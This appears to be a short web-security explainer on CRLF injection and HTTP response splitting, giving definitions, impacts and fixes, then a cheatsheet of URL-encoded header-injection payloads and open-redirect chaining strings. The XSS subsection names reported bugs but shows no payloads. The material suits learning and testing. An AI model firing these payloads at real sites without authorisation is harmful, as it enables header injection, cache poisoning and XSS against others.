CRLF Injection defines as CR (Carriage Return) and LF (Line Feed).
CRLF Injection is a one of types of Web injection attacks. By exploiting the CRLF injection flaw in an HTTP response.
They’re used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems.
In Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
Cyber attackers can modify the application data, compromising integrity and enabling the exploitation of another vulnerabilities such as Cross Site Scripting (XSS), Web Page injection, Web server cache poisoning, Website defacement and more.
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
How To Fix?
- You should always use a function to encode the CR and LF special characters.
- Strip any newline characters before passing content into the HTTP header.
- Encode the data that you pass into HTTP headers. This will effectively scramble the CR and LF codes if the attacker attempts to inject them.
CRLF Injection Cheatsheet
CRLF Injection || HTTP Response Splitting
Header-based test, site root
%0d%0aheader:header %0aheader:header %0dheader:header %23%0dheader:header %3f%0dheader:header /%250aheader:header /%25250aheader:header /%%0a0aheader:header /%3f%0dheader:header /%23%0dheader:header /%25%30aheader:header /%25%30%61header:header /%u000aheader:header
CRLF chained with Open Redirect server misconfiguration
Note: This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)
//www.google.com/%2f%2e%2e%0d%0aheader:header /www.google.com/%2e%2e%2f%0d%0aheader:header /google.com/%2F..%0d%0aheader:header
CRLF Injection to XSS
Response splitting on 302 Redirect, before Location header (Discovered in DoD)
Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301 by @black2fan (Facebook bug)
Note: xxx:1 was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.
Source: Owasp, GitHub